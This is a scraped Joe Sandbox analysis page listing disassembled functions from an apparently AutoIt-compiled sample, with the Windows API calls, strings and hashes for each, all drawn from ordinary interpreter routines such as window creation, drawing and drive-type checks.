Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5738118d8477ab60174bb8672b02cdcf7874b39043f47ce874a9af2ac6faef88
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 3FC1813220509309DF6D46BAC47443FBAA15AB3BB131A077ED4B3CB6D5EF28D528D624

Function 004EA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004EA2FE
DeleteObject.GDI32(00000000), ref: 004EA310
DestroyWindow.USER32 ref: 004EA31E
GetDesktopWindow.USER32 ref: 004EA338
GetWindowRect.USER32(00000000), ref: 004EA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004EA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004EA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA4D8
GetClientRect.USER32(00000000,?), ref: 004EA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004EA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA55E
GlobalLock.KERNEL32(00000000), ref: 004EA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA576
GlobalUnlock.KERNEL32(00000000), ref: 004EA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA586
GlobalFree.KERNEL32(00000000), ref: 004EA591
CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 004EA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0051D9BC,00000000), ref: 004EA5B9
GlobalFree.KERNEL32(00000000), ref: 004EA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004EA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004EA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA81D

Strings

DISPLAY, xrefs: 004EA680
, xrefs: 004EA7A3
static, xrefs: 004EA518, 004EA66F
AutoIt v3, xrefs: 004EA4D0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ed03e9fac64514ad7795d323cb00b70634af3e14b0bc035520c4dc4c65496156
Instruction ID: fb3675f40c25447252aecc334f57114609535df2b8b8652dd35da2eeac50411d
Opcode Fuzzy Hash: ed03e9fac64514ad7795d323cb00b70634af3e14b0bc035520c4dc4c65496156
Instruction Fuzzy Hash: 8402CC75900204EFCB14DFA5CD88EAE7BB8FB48315F008169F915AB2A0C738ED05DB64

Function 004FD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 004FD2DB
GetSysColorBrush.USER32(0000000F), ref: 004FD30C
GetSysColor.USER32(0000000F), ref: 004FD318
SetBkColor.GDI32(?,000000FF), ref: 004FD332
SelectObject.GDI32(?,00000000), ref: 004FD341
InflateRect.USER32(?,000000FF,000000FF), ref: 004FD36C
GetSysColor.USER32(00000010), ref: 004FD374
CreateSolidBrush.GDI32(00000000), ref: 004FD37B
FrameRect.USER32(?,?,00000000), ref: 004FD38A
DeleteObject.GDI32(00000000), ref: 004FD391
InflateRect.USER32(?,000000FE,000000FE), ref: 004FD3DC
FillRect.USER32(?,?,00000000), ref: 004FD40E
GetWindowLongW.USER32(?,000000F0), ref: 004FD439

Part of subcall function 004FD575: GetSysColor.USER32(00000012), ref: 004FD5AE
Part of subcall function 004FD575: SetTextColor.GDI32(?,?), ref: 004FD5B2
Part of subcall function 004FD575: GetSysColorBrush.USER32(0000000F), ref: 004FD5C8
Part of subcall function 004FD575: GetSysColor.USER32(0000000F), ref: 004FD5D3
Part of subcall function 004FD575: GetSysColor.USER32(00000011), ref: 004FD5F0
Part of subcall function 004FD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004FD5FE
Part of subcall function 004FD575: SelectObject.GDI32(?,00000000), ref: 004FD60F
Part of subcall function 004FD575: SetBkColor.GDI32(?,00000000), ref: 004FD618
Part of subcall function 004FD575: SelectObject.GDI32(?,?), ref: 004FD625
Part of subcall function 004FD575: InflateRect.USER32(?,000000FF,000000FF), ref: 004FD644
Part of subcall function 004FD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004FD65B
Part of subcall function 004FD575: GetWindowLongW.USER32(00000000,000000F0), ref: 004FD670
Part of subcall function 004FD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004FD698

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 45ca5e3cf1c58a301811635966ea2900ecb04148b218bbf922c8431d654f2756
Instruction ID: 87196f1570c1ed30bf3d3dab6e144366e027d54bed0626367d4ff9bc36e877e0
Opcode Fuzzy Hash: 45ca5e3cf1c58a301811635966ea2900ecb04148b218bbf922c8431d654f2756
Instruction Fuzzy Hash: 4191C272408305BFC7109F64DC08EAB7BBAFF99325F104A19FA62961E0D734D948DB62

Function 004DDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004DDBD6
GetDriveTypeW.KERNEL32(?,0052DC54,?,\\.\,0052DC00), ref: 004DDCC3
SetErrorMode.KERNEL32(00000000,0052DC54,?,\\.\,0052DC00), ref: 004DDE29

Strings

MMC, xrefs: 004DDDE7
RAID, xrefs: 004DDDC4
USB, xrefs: 004DDDBD
Unknown, xrefs: 004DDCE3, 004DDD8C
ATAPI, xrefs: 004DDD9A
FileBackedVirtual, xrefs: 004DDDF5
Network, xrefs: 004DDD01
RAMDisk, xrefs: 004DDCED
SAS, xrefs: 004DDDD2
Fibre, xrefs: 004DDDB6
CDROM, xrefs: 004DDCF7
SCSI, xrefs: 004DDD93
SSD, xrefs: 004DDD50
Removable, xrefs: 004DDD15
SATA, xrefs: 004DDDD9
1394, xrefs: 004DDDA8
Fixed, xrefs: 004DDD0B
\\.\, xrefs: 004DDC2B
iSCSI, xrefs: 004DDDCB
ATA, xrefs: 004DDDA1
Virtual, xrefs: 004DDDEE
PhysicalDrive, xrefs: 004DDC67
SSA, xrefs: 004DDDAF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: fa45abb09bc3affd9ac7615c36ec23ca6b7aa7533ae2cd8d74ea3519f36496c6
Instruction ID: 998aead38bcfc09a7071ff64a1bfb9f544d8b70506ff9b8d5452502e53dcec8f
Opcode Fuzzy Hash: fa45abb09bc3affd9ac7615c36ec23ca6b7aa7533ae2cd8d74ea3519f36496c6
Instruction Fuzzy Hash: 8151B930A487419BCB14DF24C8A296ABBA2FF94708F20452FF447973A1DB78D946D74B

Function 0049CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0049CC68
__wcsnicmp.LIBCMT ref: 0049CC80
__wcsnicmp.LIBCMT ref: 0049CC98
__wcsnicmp.LIBCMT ref: 0049CCB0
__wcsnicmp.LIBCMT ref: 0049CCC8
__wcsnicmp.LIBCMT ref: 0049CCE0
__wcsnicmp.LIBCMT ref: 0049CCF8
__wcsnicmp.LIBCMT ref: 0049CD0C
__wcsnicmp.LIBCMT ref: 0049CD4D
__wcsnicmp.LIBCMT ref: 0049CD61
__wcsnicmp.LIBCMT ref: 0049CD75
__wcsnicmp.LIBCMT ref: 0049CD89

Strings

#include-once, xrefs: 0049CCC2
#include, xrefs: 0049CCDA
#notrayicon, xrefs: 0049CC7A
Bad directive syntax error, xrefs: 00502ECB
#comments-end, xrefs: 0049CD6F
#ce, xrefs: 0049CD83
#OnAutoItStartRegister, xrefs: 0049CCAA
#cs, xrefs: 0049CD06, 0049CD5B
Unterminated group of comments, xrefs: 00502FB4
#comments-start, xrefs: 0049CCF2, 0049CD47
Cannot parse #include, xrefs: 00502FA1
#pragma compile, xrefs: 0049CC62
#requireadmin, xrefs: 0049CC92

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 995e8a2d4ce84b176ada45af1e1fc3fb30c585ac44cefda9fc46a52e7f17fe8a
Instruction ID: c70a80d582198bebe341fb1a51d194df4d646fe35cb5f505fcb1417333296cb6
Opcode Fuzzy Hash: 995e8a2d4ce84b176ada45af1e1fc3fb30c585ac44cefda9fc46a52e7f17fe8a
Instruction Fuzzy Hash: 0C810631640215AACF10AB65DC92FBF3F78BF25344F04403AF906AA1D6EB68D901C6A9

Function 004AB8FD Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 004AB98B
DeleteObject.GDI32(00000000), ref: 004AB9CD
DeleteObject.GDI32(00000000), ref: 004AB9D8
DestroyCursor.USER32(00000000), ref: 004AB9E3
DestroyWindow.USER32(00000000), ref: 004AB9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0050D2AA
6FFC0200.COMCTL32(?,000000FF,?), ref: 0050D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0050D711

Part of subcall function 004AB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004AB759,?,00000000,?,?,?,?,004AB72B,00000000,?), ref: 004ABA58

SendMessageW.USER32 ref: 0050D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0050D76F

Strings

0, xrefs: 0050D5A5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$C0200CursorInvalidateMoveRect
String ID: 0
API String ID: 3497448939-4108050209
Opcode ID: e15edcb30899bf375bd240490ee72a4c02699a6f72fe68a608d38bae9c42fb0d
Instruction ID: ba53f4ee85e9dcb7cf725ce7516aa2fa14b47df8ec0154755ea89e769662bb81
Opcode Fuzzy Hash: e15edcb30899bf375bd240490ee72a4c02699a6f72fe68a608d38bae9c42fb0d
Instruction Fuzzy Hash: C8129074104201DFDB25CF68C884BAABBF5FF59304F14456AE989CB2A2C735EC46DBA1

Function 004FC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 004FC788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004FC83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 004FC859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 004FCB15

Strings

0, xrefs: 004FC89C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 78cdb95e4883c25cad751f6e94b5151d9abd57b2c90c3e90d16c8a399c6898ce
Instruction ID: 6b73a17316867efb1fbf8d194d8bb3ab89a4c74dcbe55743046331f29b5a1d79
Opcode Fuzzy Hash: 78cdb95e4883c25cad751f6e94b5151d9abd57b2c90c3e90d16c8a399c6898ce
Instruction Fuzzy Hash: 0EF1E07050430DAFD7208F24C985BBBBBE4FF49354F08451AF688962A1C778D845DBA6

Function 004F638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0052DC00), ref: 004F6449

Strings

CHECK, xrefs: 004F668B
CURRENTTAB, xrefs: 004F64DD
FINDSTRING, xrefs: 004F6596
UNCHECK, xrefs: 004F66A1
GETLINECOUNT, xrefs: 004F66E4
SETCURRENTSELECTION, xrefs: 004F65D6
GETSELECTED, xrefs: 004F66C1
GETCURRENTSELECTION, xrefs: 004F6603
ISENABLED, xrefs: 004F648C
TABLEFT, xrefs: 004F64A7
DELSTRING, xrefs: 004F6569
HIDEDROPDOWN, xrefs: 004F6520
ISCHECKED, xrefs: 004F6659
GETCURRENTCOL, xrefs: 004F6724
TABRIGHT, xrefs: 004F64BD
EDITPASTE, xrefs: 004F675B
SENDCOMMANDID, xrefs: 004F67CA
GETCURRENTLINE, xrefs: 004F6704
ADDSTRING, xrefs: 004F6536
SELECTSTRING, xrefs: 004F6626
ISVISIBLE, xrefs: 004F6455
GETLINE, xrefs: 004F678B
SHOWDROPDOWN, xrefs: 004F6500

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 4300795b8409b273d4c46f2d64304303d6d7ae6db33fc748c7108d7a94ce13a6
Instruction ID: be704c7199382367a0622776653a633eda84f34e2d3354344fa72d40305e5ee3
Opcode Fuzzy Hash: 4300795b8409b273d4c46f2d64304303d6d7ae6db33fc748c7108d7a94ce13a6
Instruction Fuzzy Hash: F8C1A2342042099BCA04FF11C551ABE7BE5AF95358F01486FF9555B393DB28ED0BCB8A

Function 004FD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 004FD5AE
SetTextColor.GDI32(?,?), ref: 004FD5B2
GetSysColorBrush.USER32(0000000F), ref: 004FD5C8
GetSysColor.USER32(0000000F), ref: 004FD5D3
CreateSolidBrush.GDI32(?), ref: 004FD5D8
GetSysColor.USER32(00000011), ref: 004FD5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 004FD5FE
SelectObject.GDI32(?,00000000), ref: 004FD60F
SetBkColor.GDI32(?,00000000), ref: 004FD618
SelectObject.GDI32(?,?), ref: 004FD625
InflateRect.USER32(?,000000FF,000000FF), ref: 004FD644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004FD65B
GetWindowLongW.USER32(00000000,000000F0), ref: 004FD670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004FD698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004FD6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 004FD6DD
DrawFocusRect.USER32(?,?), ref: 004FD6E8
GetSysColor.USER32(00000011), ref: 004FD6F6
SetTextColor.GDI32(?,00000000), ref: 004FD6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004FD712
SelectObject.GDI32(?,004FD2A5), ref: 004FD729
DeleteObject.GDI32(?), ref: 004FD734
SelectObject.GDI32(?,?), ref: 004FD73A
DeleteObject.GDI32(?), ref: 004FD73F
SetTextColor.GDI32(?,?), ref: 004FD745
SetBkColor.GDI32(?,?), ref: 004FD74F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: dadeaea5423c72356122edd757ee69d34526a8cecdf137ca6c5df370dd7543e9
Instruction ID: 3c45fe00e4daea3780abd572a7a9a2b5d6afc90df5565d13ceedefbf4e3e5afa
Opcode Fuzzy Hash: dadeaea5423c72356122edd757ee69d34526a8cecdf137ca6c5df370dd7543e9
Instruction Fuzzy Hash: 1A515B71D00218BFDB10AFA4DC48EEE7B7AEF18320F118115FA15AB2A1D7759A44DB60

Function 004FB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004FB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004FB7C1
CharNextW.USER32(0000014E), ref: 004FB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004FB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004FB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004FB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004FB875
SetWindowTextW.USER32(?,0000014E), ref: 004FB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004FB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 004FB90E
_memset.LIBCMT ref: 004FB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004FB97C
_memset.LIBCMT ref: 004FB9DB
SendMessageW.USER32 ref: 004FBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 004FBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 004FBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 004FBB2C
GetMenuItemInfoW.USER32(?), ref: 004FBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004FBBA3
DrawMenuBar.USER32(?), ref: 004FBBB2
SetWindowTextW.USER32(?,0000014E), ref: 004FBBDA

Strings

0, xrefs: 004FBB4F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 8bf7cf97eb1c74e955f30b2024ba01bffa557a3e78005b8e3a72918bc2596d89
Instruction ID: a210da1d61df796aa6e49538a5fd03656b927cd892d5d4855fc0dea3bb074821
Opcode Fuzzy Hash: 8bf7cf97eb1c74e955f30b2024ba01bffa557a3e78005b8e3a72918bc2596d89
Instruction Fuzzy Hash: EFE19E7490021CAADB109FA1CC84EFF7BB8FF06714F10815BFA15AA290D7789A45DFA5

Function 004F764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004F778A
GetDesktopWindow.USER32 ref: 004F779F
GetWindowRect.USER32(00000000), ref: 004F77A6
GetWindowLongW.USER32(?,000000F0), ref: 004F7808
DestroyWindow.USER32(?), ref: 004F7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004F785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004F787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004F78A1
SendMessageW.USER32(?,00000421,?,?), ref: 004F78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004F78C9
IsWindowVisible.USER32(?), ref: 004F78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004F7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004F7918
GetWindowRect.USER32(?,?), ref: 004F7930
MonitorFromPoint.USER32(?,?,00000002), ref: 004F7956
GetMonitorInfoW.USER32 ref: 004F7970
CopyRect.USER32(?,?), ref: 004F7987
SendMessageW.USER32(?,00000412,00000000), ref: 004F79F2

Strings

0, xrefs: 004F7735
(, xrefs: 004F7965
tooltips_class32, xrefs: 004F7856

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
